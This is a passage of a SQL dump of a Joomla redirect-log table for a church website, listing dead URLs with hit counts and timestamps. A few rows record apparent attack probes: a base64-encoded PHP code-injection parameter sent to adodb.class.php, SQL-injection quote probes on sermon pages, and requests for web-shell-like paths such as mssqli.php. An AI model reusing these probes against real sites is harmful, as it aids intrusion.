(3606, 'http://lifeoasisinternationalchurch.org/index.php/184-2015-day-8', NULL, '', '', 1, 0, '2017-02-10 16:37:58', '0000-00-00 00:00:00', 301),
(3607, 'http://lifeoasisinternationalchurch.org/index.php/185-2015-day-9', NULL, '', '', 1, 0, '2017-02-10 16:49:36', '0000-00-00 00:00:00', 301),
(3608, 'http://lifeoasisinternationalchurch.org/index.php/188-2015-day-11', NULL, '', '', 1, 0, '2017-02-10 16:49:37', '0000-00-00 00:00:00', 301),
(3609, 'http://lifeoasisinternationalchurch.org/index.php/190-2015-day-14', NULL, '', '', 1, 0, '2017-02-10 16:49:37', '0000-00-00 00:00:00', 301),
(3610, 'http://lifeoasisinternationalchurch.org/index.php/192-2015-day-16', NULL, '', '', 1, 0, '2017-02-10 16:49:38', '0000-00-00 00:00:00', 301),
(3611, 'http://lifeoasisinternationalchurch.org/index.php/196-2015-day-19', NULL, '', '', 1, 0, '2017-02-10 16:49:38', '0000-00-00 00:00:00', 301),
(3612, 'http://lifeoasisinternationalchurch.org/index.php/193-2015-day-17', NULL, '', '', 1, 0, '2017-02-10 16:54:27', '0000-00-00 00:00:00', 301),
(3613, 'http://lifeoasisinternationalchurch.org/index.php/191-2015-day-15', NULL, '', '', 1, 0, '2017-02-10 16:54:52', '0000-00-00 00:00:00', 301),
(3614, 'http://lifeoasisinternationalchurch.org/index.php/187-2015-day-10', NULL, '', '', 1, 0, '2017-02-10 16:55:02', '0000-00-00 00:00:00', 301),
(3615, 'http://lifeoasisinternationalchurch.org/index.php/200-2015-day-25', NULL, '', '', 1, 0, '2017-02-10 16:55:02', '0000-00-00 00:00:00', 301),
(3616, 'http://www.lifeoasisinternationalchurch.org/live streaming', NULL, '', '', 6, 0, '2017-02-10 16:55:34', '0000-00-00 00:00:00', 301),
(3617, 'http://lifeoasisinternationalchurch.org/index.php/202-2015-day-27', NULL, '', '', 1, 0, '2017-02-10 16:56:28', '0000-00-00 00:00:00', 301),
(3618, 'http://lifeoasisinternationalchurch.org/index.php/205-2015-day-31', NULL, '', '', 1, 0, '2017-02-10 16:56:28', '0000-00-00 00:00:00', 301),
(3619, 'http://lifeoasisinternationalchurch.org/index.php/207-2015-day-33', NULL, '', '', 1, 0, '2017-02-10 16:56:29', '0000-00-00 00:00:00', 301),
(3620, 'http://lifeoasisinternationalchurch.org/index.php/208-2015-day-34', NULL, '', '', 1, 0, '2017-02-10 16:56:29', '0000-00-00 00:00:00', 301),
(3621, 'http://lifeoasisinternationalchurch.org/index.php/210-2015-day-36', NULL, '', '', 1, 0, '2017-02-10 16:56:29', '0000-00-00 00:00:00', 301),
(3622, 'http://lifeoasisinternationalchurch.org/index.php/212-2015-day-38', NULL, '', '', 1, 0, '2017-02-10 16:56:30', '0000-00-00 00:00:00', 301),
(3623, 'http://lifeoasisinternationalchurch.org/index.php/221-2016-day-4', NULL, '', '', 1, 0, '2017-02-10 16:56:30', '0000-00-00 00:00:00', 301),
(3624, 'http://lifeoasisinternationalchurch.org/index.php/222-2016-day-5', NULL, '', '', 2, 0, '2017-02-10 16:56:30', '0000-00-00 00:00:00', 301),
(3625, 'http://lifeoasisinternationalchurch.org/index.php/204-2015-day-30', NULL, '', '', 1, 0, '2017-02-10 16:57:31', '0000-00-00 00:00:00', 301),
(3626, 'http://lifeoasisinternationalchurch.org/index.php/206-2015-day-32', NULL, '', '', 1, 0, '2017-02-10 16:57:31', '0000-00-00 00:00:00', 301),
(3627, 'http://lifeoasisinternationalchurch.org/index.php/209-2015-day-35', NULL, '', '', 1, 0, '2017-02-10 16:57:32', '0000-00-00 00:00:00', 301),
(3628, 'http://lifeoasisinternationalchurch.org/index.php/211-2015-day-37', NULL, '', '', 1, 0, '2017-02-10 16:57:32', '0000-00-00 00:00:00', 301),
(3629, 'http://lifeoasisinternationalchurch.org/index.php/213-2015-day-39', NULL, '', '', 1, 0, '2017-02-10 16:57:33', '0000-00-00 00:00:00', 301),
(3630, 'http://lifeoasisinternationalchurch.org/index.php/217-2015-day-40', NULL, '', '', 1, 0, '2017-02-10 16:57:33', '0000-00-00 00:00:00', 301),
(3631, 'http://lifeoasisinternationalchurch.org/index.php/219-2016-day-2', NULL, '', '', 1, 0, '2017-02-10 16:58:51', '0000-00-00 00:00:00', 301),
(3632, 'http://www.lifeoasisinternationalchurch.org/144-2014-15', NULL, '', '', 1, 0, '2017-02-10 17:04:05', '0000-00-00 00:00:00', 301),
(3633, 'http://lifeoasisinternationalchurch.org/index.php/199-2015-day-24', NULL, '', '', 1, 0, '2017-02-10 17:04:07', '0000-00-00 00:00:00', 301),
(3634, 'http://lifeoasisinternationalchurch.org/index.php/203-2015-day-29', NULL, '', '', 1, 0, '2017-02-10 17:04:07', '0000-00-00 00:00:00', 301),
(3635, 'http://lifeoasisinternationalchurch.org/index.php/215-2015-day-13-1', NULL, '', '', 2, 0, '2017-02-10 17:04:07', '0000-00-00 00:00:00', 301),
(3636, 'http://www.lifeoasisinternationalchurch.org/videos', NULL, '', '', 5, 0, '2017-02-10 17:34:33', '0000-00-00 00:00:00', 301),
(3637, 'http://www.lifeoasisinternationalchurch.org/139-2014-10', NULL, '', '', 1, 0, '2017-02-10 18:58:42', '0000-00-00 00:00:00', 301),
(3638, 'http://lifeoasisinternationalchurch.org/index.php/197-2015-day-22', NULL, '', '', 1, 0, '2017-02-10 19:40:51', '0000-00-00 00:00:00', 301),
(3639, 'http://lifeoasisinternationalchurch.org/index.php/201-2015-day-26', NULL, '', '', 1, 0, '2017-02-10 19:40:51', '0000-00-00 00:00:00', 301),
(3640, 'http://lifeoasisinternationalchurch.org/index.php/214-2015-day-21', NULL, '', '', 1, 0, '2017-02-10 19:40:52', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(3641, 'http://lifeoasisinternationalchurch.org/index.php/216-2015-day-28', NULL, '', '', 1, 0, '2017-02-10 19:40:52', '0000-00-00 00:00:00', 301),
(3642, 'http://lifeoasisinternationalchurch.org/index.php/218-2016-day-1', NULL, '', '', 7, 0, '2017-02-10 20:35:37', '0000-00-00 00:00:00', 301),
(3643, 'http://lifeoasisinternationalchurch.org/index.php/template-info-2/our-service-schedule/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-02-10 23:32:19', '0000-00-00 00:00:00', 301),
(3644, 'http://lifeoasisinternationalchurch.org/prayer/140-2014-11', NULL, '', '', 1, 0, '2017-02-11 01:42:58', '0000-00-00 00:00:00', 301),
(3645, 'http://lifeoasisinternationalchurch.org/prayer/125-prayer-focus-for-day-36', NULL, '', '', 1, 0, '2017-02-11 03:25:22', '0000-00-00 00:00:00', 301),
(3646, 'http://www.lifeoasisinternationalchurch.org/156-focus32-3', NULL, '', '', 1, 0, '2017-02-11 03:45:55', '0000-00-00 00:00:00', 301),
(3647, 'http://www.lifeoasisinternationalchurch.org/index.php/180-2015-day-4', NULL, '', '', 6, 0, '2017-02-11 05:35:43', '0000-00-00 00:00:00', 301),
(3648, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/19-prayer-a-fasting-day-10', NULL, '', '', 1, 0, '2017-02-11 05:45:54', '0000-00-00 00:00:00', 301),
(3649, 'http://www.lifeoasisinternationalchurch.org/12-prayer-a-fasting-day-3', NULL, '', '', 2, 0, '2017-02-11 06:15:36', '0000-00-00 00:00:00', 301),
(3650, 'http://www.lifeoasisinternationalchurch.org/component/content/index.php', NULL, '', '', 3, 0, '2017-02-11 19:48:53', '0000-00-00 00:00:00', 301),
(3651, 'http://www.lifeoasisinternationalchurch.org/component/content/article/2-uncategorised/47-videos', NULL, '', '', 5, 0, '2017-02-11 21:48:51', '0000-00-00 00:00:00', 301),
(3652, 'http://www.lifeoasisinternationalchurch.org/-tooexclusivefaith', NULL, '', '', 1, 0, '2017-02-11 22:13:22', '0000-00-00 00:00:00', 301),
(3653, 'http://lifeoasisinternationalchurch.org/event/asom', NULL, 'http://lifeoasisinternationalchurch.org/event/asom', '', 90, 0, '2017-02-11 22:21:35', '0000-00-00 00:00:00', 301),
(3654, 'http://www.lifeoasisinternationalchurch.org/gobcwel.php', NULL, '', '', 2, 0, '2017-02-12 00:40:41', '0000-00-00 00:00:00', 301),
(3655, 'http://www.lifeoasisinternationalchurch.org/index.php/159-day-31', NULL, '', '', 5, 0, '2017-02-12 01:43:03', '0000-00-00 00:00:00', 301),
(3656, 'http://www.lifeoasisinternationalchurch.org/loic-forum/10-about-us', NULL, '', '', 3, 0, '2017-02-12 02:08:06', '0000-00-00 00:00:00', 301),
(3657, 'http://lifeoasisinternationalchurch.org/create-an-account.html', NULL, 'http://lifeoasisinternationalchurch.org/create-an-account.html', '', 3, 0, '2017-02-12 02:13:36', '0000-00-00 00:00:00', 301),
(3658, 'http://www.lifeoasisinternationalchurch.org/ministries/ljmti/10-about-us', NULL, '', '', 1, 0, '2017-02-12 02:49:40', '0000-00-00 00:00:00', 301),
(3659, 'http://lifeoasisinternationalchurch.org/index.php/11-demo-articles/10-preset-styles', NULL, '', '', 1, 0, '2017-02-12 03:12:49', '0000-00-00 00:00:00', 301),
(3660, 'http://www.lifeoasisinternationalchurch.org/event/asom', NULL, '', '', 63, 0, '2017-02-12 03:19:37', '0000-00-00 00:00:00', 301),
(3661, 'http://lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles/10-preset-styles', NULL, '', '', 1, 0, '2017-02-12 03:46:19', '0000-00-00 00:00:00', 301),
(3662, 'http://lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/10-prayer-a-fasting-day-1', NULL, '', '', 1, 0, '2017-02-12 04:04:48', '0000-00-00 00:00:00', 301),
(3663, 'http://lifeoasisinternationalchurch.org/admin', NULL, '', '', 3, 0, '2017-02-12 07:03:20', '0000-00-00 00:00:00', 301),
(3664, 'http://lifeoasisinternationalchurch.org/admin.php', NULL, '', '', 8, 0, '2017-02-12 07:03:37', '0000-00-00 00:00:00', 301),
(3665, 'http://www.lifeoasisinternationalchurch.org/148-day222014-3', NULL, '', '', 1, 0, '2017-02-12 07:55:10', '0000-00-00 00:00:00', 301),
(3666, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=20:welcome&catid=11&Itemid=101', NULL, '', '', 1, 0, '2017-02-12 08:38:05', '0000-00-00 00:00:00', 301),
(3667, 'http://lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/20-prayer-a-fasting-day-11', NULL, '', '', 1, 0, '2017-02-12 08:39:16', '0000-00-00 00:00:00', 301),
(3668, 'http://lifeoasisinternationalchurch.org/prayer/143-2014-14', NULL, '', '', 1, 0, '2017-02-12 12:28:18', '0000-00-00 00:00:00', 301),
(3669, 'http://lifeoasisinternationalchurch.org/prayer/169-focus38-2', NULL, '', '', 1, 0, '2017-02-12 14:28:25', '0000-00-00 00:00:00', 301),
(3670, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/21-prayer-a-fasting-day-12', NULL, '', '', 1, 0, '2017-02-12 17:06:03', '0000-00-00 00:00:00', 301),
(3671, 'http://www.lifeoasisinternationalchurch.org/estore/', NULL, '', '', 2, 0, '2017-02-12 18:52:58', '0000-00-00 00:00:00', 301),
(3672, 'http://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/15-sample-content-4', NULL, '', '', 1, 0, '2017-02-12 19:27:31', '0000-00-00 00:00:00', 301),
(3673, 'http://www.lifeoasisinternationalchurch.org/streaming/n/nDon\'t', NULL, '', '', 1, 0, '2017-02-12 20:02:56', '0000-00-00 00:00:00', 301),
(3674, 'http://lifeoasisinternationalchurch.org/index.php/web-of-wisdom-registration', NULL, '', '', 1, 0, '2017-02-13 00:14:26', '0000-00-00 00:00:00', 301),
(3675, 'http://www.lifeoasisinternationalchurch.org/127-prayer-focus-for-day-38', NULL, '', '', 1, 0, '2017-02-13 02:27:39', '0000-00-00 00:00:00', 301),
(3676, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/6', NULL, '', '', 1, 0, '2017-02-13 09:12:01', '0000-00-00 00:00:00', 301),
(3677, 'http://www.lifeoasisinternationalchurch.org/106-prayer-focus-for-day-15', NULL, '', '', 1, 0, '2017-02-13 10:13:46', '0000-00-00 00:00:00', 301),
(3678, 'http://www.lifeoasisinternationalchurch.org/prayer/154-focus32', NULL, '', '', 1, 0, '2017-02-13 10:39:51', '0000-00-00 00:00:00', 301),
(3679, 'http://lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-f6163819fe143f8e41e43a2c4c098601.php', NULL, 'http://lifeoasisinternationalchurch.org/index.php?option=com_search&view=search&tmpl=component', '', 2, 0, '2017-02-13 13:22:00', '0000-00-00 00:00:00', 301),
(3680, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/11', NULL, '', '', 1, 0, '2017-02-13 13:26:15', '0000-00-00 00:00:00', 301),
(3681, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/', NULL, '', '', 3, 0, '2017-02-13 15:17:36', '0000-00-00 00:00:00', 301),
(3682, 'http://lifeoasisinternationalchurch.org/searchreplacedb2.php', NULL, '', '', 4, 0, '2017-02-13 15:31:49', '0000-00-00 00:00:00', 301),
(3683, 'http://lifeoasisinternationalchurch.org/asom2016', NULL, '', '', 19, 0, '2017-02-13 16:42:56', '0000-00-00 00:00:00', 301),
(3684, 'http://lifeoasisinternationalchurch.org/component/prayercenter/?task=view&itemid=10111', NULL, '', '', 1, 0, '2017-02-13 17:32:59', '0000-00-00 00:00:00', 301),
(3685, 'http://lifeoasisinternationalchurch.org/blog/administrator/', NULL, '', '', 2, 0, '2017-02-13 18:17:22', '0000-00-00 00:00:00', 301),
(3686, 'http://lifeoasisinternationalchurch.org/blog/admin.php', NULL, '', '', 2, 0, '2017-02-13 18:17:24', '0000-00-00 00:00:00', 301),
(3687, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/18-army-of-the-lord-1', NULL, '', '', 1, 0, '2017-02-13 22:31:09', '0000-00-00 00:00:00', 301),
(3688, 'http://www.lifeoasisinternationalchurch.org/index.php/181-2015-day-5', NULL, '', '', 5, 0, '2017-02-14 08:31:38', '0000-00-00 00:00:00', 301),
(3689, 'http://www.lifeoasisinternationalchurch.org/index.php/2012-11-09-09-57-10/seminar', NULL, '', '', 3, 0, '2017-02-14 10:34:54', '0000-00-00 00:00:00', 301),
(3690, 'http://lifeoasisinternationalchurch.org/about-us/rev-olusola-areogun', NULL, '', '', 1, 0, '2017-02-14 11:36:13', '0000-00-00 00:00:00', 301),
(3691, 'http://www.lifeoasisinternationalchurch.org/resources/online-store', NULL, '', '', 3, 0, '2017-02-14 14:43:35', '0000-00-00 00:00:00', 301),
(3692, 'http://www.lifeoasisinternationalchurch.org/xmlrpc.php', NULL, 'http://www.lifeoasisinternationalchurch.org/xmlrpc.php', '', 46, 0, '2017-02-14 17:44:25', '0000-00-00 00:00:00', 301),
(3693, 'http://www.lifeoasisinternationalchurch.org/docs/logo_img.php', NULL, 'http://www.lifeoasisinternationalchurch.org/docs/logo_img.php', '', 1, 0, '2017-02-14 17:44:25', '0000-00-00 00:00:00', 301),
(3694, 'http://www.lifeoasisinternationalchurch.org/component/joomailermailchimpintegration/', NULL, 'http://www.lifeoasisinternationalchurch.org/streaming', '', 4, 0, '2017-02-14 18:19:58', '0000-00-00 00:00:00', 301),
(3695, 'http://lifeoasisinternationalchurch.org/mp3/iphonemesseges', NULL, '', '', 2, 0, '2017-02-14 22:10:36', '0000-00-00 00:00:00', 301),
(3696, 'http://www.lifeoasisinternationalchurch.org/index.php/188-2015-day-11', NULL, '', '', 6, 0, '2017-02-15 02:46:31', '0000-00-00 00:00:00', 301),
(3697, 'http://lifeoasisinternationalchurch.org/loicforum/index.php', NULL, 'http://lifeoasisinternationalchurch.org/loicforum/index.php', '', 4, 0, '2017-02-15 04:30:07', '0000-00-00 00:00:00', 301),
(3698, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/30-prophetic-words-for-day-21', NULL, '', '', 1, 0, '2017-02-15 05:51:20', '0000-00-00 00:00:00', 301),
(3699, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/7-enemies-of-gods-word-1', NULL, '', '', 11, 0, '2017-02-15 14:35:39', '0000-00-00 00:00:00', 301),
(3700, 'http://www.lifeoasisinternationalchurch.org/css.php', NULL, 'http://www.lifeoasisinternationalchurch.org/css.php', '', 2, 0, '2017-02-15 17:00:37', '0000-00-00 00:00:00', 301),
(3701, 'http://lifeoasisinternationalchurch.org/index.php/11-demo-articles/53-testing', NULL, '', '', 1, 0, '2017-02-15 19:54:20', '0000-00-00 00:00:00', 301),
(3702, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/53-prayer-a-fasting-day-40', NULL, '', '', 8, 0, '2017-02-15 20:04:47', '0000-00-00 00:00:00', 301),
(3703, 'http://lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles/53-testing', NULL, '', '', 2, 0, '2017-02-15 20:26:52', '0000-00-00 00:00:00', 301),
(3704, 'http://www.lifeoasisinternationalchurch.org/prayer/component/mailto/?tmpl=component&template=prayer5&link=7825c202aec0bcf77100175a66e34dfb2221f571', NULL, '', '', 2, 0, '2017-02-15 20:46:33', '0000-00-00 00:00:00', 301),
(3705, 'http://lifeoasisinternationalchurch.org/blog/', NULL, '', '', 15, 0, '2017-02-15 20:54:24', '0000-00-00 00:00:00', 301),
(3706, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/7', NULL, '', '', 2, 0, '2017-02-15 22:04:36', '0000-00-00 00:00:00', 301),
(3707, 'http://lifeoasisinternationalchurch.org/index.php/260-day-22-of-22-days-fasting-and-prayer-october-2', NULL, '', '', 3, 0, '2017-02-15 23:48:43', '0000-00-00 00:00:00', 301),
(3708, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0', NULL, '', '', 34, 0, '2017-02-16 04:36:09', '0000-00-00 00:00:00', 301),
(3709, 'http://www.lifeoasisinternationalchurch.org/plus/flink.php?dopost=save', NULL, '', '', 2, 0, '2017-02-16 08:55:17', '0000-00-00 00:00:00', 301),
(3710, 'http://lifeoasisinternationalchurch.org/index.php/guidelines', NULL, '', '', 1, 0, '2017-02-16 16:10:16', '0000-00-00 00:00:00', 301),
(3711, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/12-manifesting-spiritual-gifts', NULL, '', '', 1, 0, '2017-02-16 16:10:17', '0000-00-00 00:00:00', 301),
(3712, 'http://lifeoasisinternationalchurch.org/administrator/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-02-16 16:33:57', '0000-00-00 00:00:00', 301),
(3713, 'http://lifeoasisinternationalchurch.org/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-02-16 16:52:43', '0000-00-00 00:00:00', 301),
(3714, 'http://lifeoasisinternationalchurch.org/wp-admin/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-02-16 17:15:38', '0000-00-00 00:00:00', 301),
(3715, 'http://lifeoasisinternationalchurch.org/index.php/241-2016-day-24', NULL, '', '', 2, 0, '2017-02-16 18:06:07', '0000-00-00 00:00:00', 301),
(3716, 'http://lifeoasisinternationalchurch.org/index.php/240-2016-day-23', NULL, '', '', 2, 0, '2017-02-16 18:11:20', '0000-00-00 00:00:00', 301),
(3717, 'http://lifeoasisinternationalchurch.org/index.php/237-2016-day-20', NULL, '', '', 1, 0, '2017-02-16 18:11:21', '0000-00-00 00:00:00', 301),
(3718, 'http://lifeoasisinternationalchurch.org/index.php/228-2016-day-11', NULL, '', '', 1, 0, '2017-02-16 18:11:21', '0000-00-00 00:00:00', 301),
(3719, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/2-building-a-bilblical-relationship-with-the-word-of-god-2', NULL, '', '', 1, 0, '2017-02-16 18:13:33', '0000-00-00 00:00:00', 301),
(3720, 'http://lifeoasisinternationalchurch.org/index.php/236-2016-day-19', NULL, '', '', 1, 0, '2017-02-16 18:44:06', '0000-00-00 00:00:00', 301),
(3721, 'http://lifeoasisinternationalchurch.org/index.php/230-2016-day-13', NULL, '', '', 1, 0, '2017-02-16 18:44:07', '0000-00-00 00:00:00', 301),
(3722, 'http://lifeoasisinternationalchurch.org/index.php/233-2016-day-16', NULL, '', '', 1, 0, '2017-02-16 18:54:23', '0000-00-00 00:00:00', 301),
(3723, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/20-army-of-the-lord-3', NULL, '', '', 1, 0, '2017-02-16 18:59:29', '0000-00-00 00:00:00', 301),
(3724, 'http://lifeoasisinternationalchurch.org/index.php/231-2016-day-14', NULL, '', '', 1, 0, '2017-02-16 18:59:29', '0000-00-00 00:00:00', 301),
(3725, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/15-entering-into-winning-position-3', NULL, '', '', 1, 0, '2017-02-16 19:20:52', '0000-00-00 00:00:00', 301),
(3726, 'http://lifeoasisinternationalchurch.org/index.php/279-day-19-of-21-days-fasting-and-prayer-november', NULL, '', '', 1, 0, '2017-02-16 19:26:52', '0000-00-00 00:00:00', 301),
(3727, 'http://lifeoasisinternationalchurch.org/index.php/272-day-12-of-21-days-fasting-and-prayer-november', NULL, '', '', 1, 0, '2017-02-16 19:27:13', '0000-00-00 00:00:00', 301),
(3728, 'http://lifeoasisinternationalchurch.org/index.php/273-day-13-of-21-days-fasting-and-prayer-november', NULL, '', '', 2, 0, '2017-02-16 19:27:19', '0000-00-00 00:00:00', 301),
(3729, 'http://lifeoasisinternationalchurch.org/index.php/238-2016-day-21', NULL, '', '', 1, 0, '2017-02-16 19:31:45', '0000-00-00 00:00:00', 301),
(3730, 'http://lifeoasisinternationalchurch.org/index.php/227-2016-day-10', NULL, '', '', 1, 0, '2017-02-16 19:31:45', '0000-00-00 00:00:00', 301),
(3731, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=48:wimmp&catid=18:loic&Itemid=239', NULL, '', '', 1, 0, '2017-02-16 21:45:15', '0000-00-00 00:00:00', 301),
(3732, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/41-prayer-a-fasting-day-32', NULL, '', '', 2, 0, '2017-02-16 21:57:45', '0000-00-00 00:00:00', 301),
(3733, 'http://lifeoasisinternationalchurch.org/sitemaps', NULL, '', '', 1, 0, '2017-02-16 22:17:58', '0000-00-00 00:00:00', 301),
(3734, 'http://lifeoasisinternationalchurch.org/sitemap', NULL, '', '', 1, 0, '2017-02-16 22:17:59', '0000-00-00 00:00:00', 301),
(3735, 'http://lifeoasisinternationalchurch.org/index.php/229-2016-day-12', NULL, '', '', 1, 0, '2017-02-16 23:14:39', '0000-00-00 00:00:00', 301),
(3736, 'http://lifeoasisinternationalchurch.org/index.php/12-sample-content/17-sample-content-6', NULL, '', '', 1, 0, '2017-02-17 03:19:42', '0000-00-00 00:00:00', 301),
(3737, 'http://lifeoasisinternationalchurch.org/index.php/programme/17-fp-headlines-lists', NULL, '', '', 1, 0, '2017-02-17 03:30:25', '0000-00-00 00:00:00', 301),
(3738, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/17-prayer-a-fasting-day-1', NULL, '', '', 7, 0, '2017-02-17 04:01:42', '0000-00-00 00:00:00', 301),
(3739, 'http://lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/17-sample-content-6', NULL, '', '', 1, 0, '2017-02-17 04:12:16', '0000-00-00 00:00:00', 301),
(3740, 'http://lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/17-prayer-a-fasting-day-8', NULL, '', '', 1, 0, '2017-02-17 04:52:45', '0000-00-00 00:00:00', 301),
(3741, 'http://lifeoasisinternationalchurch.org/prayer/129-prayer-focus-for-day-40', NULL, '', '', 1, 0, '2017-02-17 11:04:24', '0000-00-00 00:00:00', 301),
(3742, 'http://lifeoasisinternationalchurch.org/pricing', NULL, '', '', 1, 0, '2017-02-17 14:13:11', '0000-00-00 00:00:00', 301),
(3743, 'http://lifeoasisinternationalchurch.org/component/jlexblock/', NULL, '', '', 23, 0, '2017-02-17 20:48:42', '0000-00-00 00:00:00', 301),
(3744, 'http://lifeoasisinternationalchurch.org/wp-admin/maint/mssqli.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-02-17 21:18:25', '0000-00-00 00:00:00', 301),
(3745, 'http://lifeoasisinternationalchurch.org/monte.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-02-17 21:51:58', '0000-00-00 00:00:00', 301),
(3746, 'http://lifeoasisinternationalchurch.org/main_.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-02-17 21:58:36', '0000-00-00 00:00:00', 301),
(3747, 'http://lifeoasisinternationalchurch.org/index.php/63-2014-10', NULL, '', '', 8, 0, '2017-02-17 21:58:44', '0000-00-00 00:00:00', 301),
(3748, 'http://lifeoasisinternationalchurch.org/mssqli.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-02-17 22:09:12', '0000-00-00 00:00:00', 301),
(3749, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/49-prophetic-words-for-day-39', NULL, '', '', 4, 0, '2017-02-18 00:18:26', '0000-00-00 00:00:00', 301),
(3750, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/49-prophetic-words-for-day-39', NULL, '', '', 3, 0, '2017-02-18 00:18:55', '0000-00-00 00:00:00', 301),
(3751, 'http://www.lifeoasisinternationalchurch.org/loic-forum/12-resources', NULL, '', '', 1, 0, '2017-02-18 02:30:51', '0000-00-00 00:00:00', 301),
(3752, 'http://lifeoasisinternationalchurch.org/12-sample-content/12-sample-content-1', NULL, '', '', 1, 0, '2017-02-18 02:36:22', '0000-00-00 00:00:00', 301),
(3753, 'http://lifeoasisinternationalchurch.org/index.php/programme/12-sample-content', NULL, '', '', 1, 0, '2017-02-18 02:42:22', '0000-00-00 00:00:00', 301),
(3754, 'http://lifeoasisinternationalchurch.org/index.php/12-sample-content/12-sample-content-1', NULL, '', '', 2, 0, '2017-02-18 02:54:37', '0000-00-00 00:00:00', 301),
(3755, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/12-prayer-a-fasting-day-3', NULL, '', '', 3, 0, '2017-02-18 03:13:47', '0000-00-00 00:00:00', 301),
(3756, 'http://lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/12-sample-content-1', NULL, '', '', 1, 0, '2017-02-18 03:41:23', '0000-00-00 00:00:00', 301),
(3757, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/8', NULL, '', '', 2, 0, '2017-02-18 03:48:31', '0000-00-00 00:00:00', 301),
(3758, 'http://lifeoasisinternationalchurch.org/7-kindom-builder/12-prayer-a-fasting-day-3', NULL, '', '', 1, 0, '2017-02-18 03:54:56', '0000-00-00 00:00:00', 301),
(3759, 'http://www.lifeoasisinternationalchurch.org/index.php/128-2014-6', NULL, '', '', 3, 0, '2017-02-18 04:34:37', '0000-00-00 00:00:00', 301),
(3760, 'http://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/12-prayer-a-fasting-day-3', NULL, '', '', 1, 0, '2017-02-18 04:37:12', '0000-00-00 00:00:00', 301),
(3761, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_prayercenter&Itemid=10111', NULL, '', '', 1, 0, '2017-02-18 04:48:54', '0000-00-00 00:00:00', 301),
(3762, 'http://lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/12-prayer-a-fasting-day-3', NULL, '', '', 1, 0, '2017-02-18 04:51:28', '0000-00-00 00:00:00', 301),
(3763, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_sermonspeaker\'A=0&view=sermons&Itemid=190', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_sermonspeaker\'A=0&view=sermons&Itemid=190', '', 1, 0, '2017-02-18 16:33:05', '0000-00-00 00:00:00', 301),
(3764, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_sermonspeaker&view=sermons\'A=0&Itemid=190', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_sermonspeaker&view=sermons\'A=0&Itemid=190', '', 1, 0, '2017-02-18 16:33:06', '0000-00-00 00:00:00', 301),
(3765, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_sermonspeaker&view=sermons&Itemid=190\'A=0', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_sermonspeaker&view=sermons&Itemid=190\'A=0', '', 1, 0, '2017-02-18 16:33:06', '0000-00-00 00:00:00', 301),
(3766, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/11', NULL, '', '', 1, 0, '2017-02-18 19:24:32', '0000-00-00 00:00:00', 301),
(3767, 'http://lifeoasisinternationalchurch.org/index.php/167-day-39', NULL, '', '', 3, 0, '2017-02-18 22:21:25', '0000-00-00 00:00:00', 301),
(3768, 'http://www.lifeoasisinternationalchurch.org/admin', NULL, '', '', 2, 0, '2017-02-19 00:27:18', '0000-00-00 00:00:00', 301),
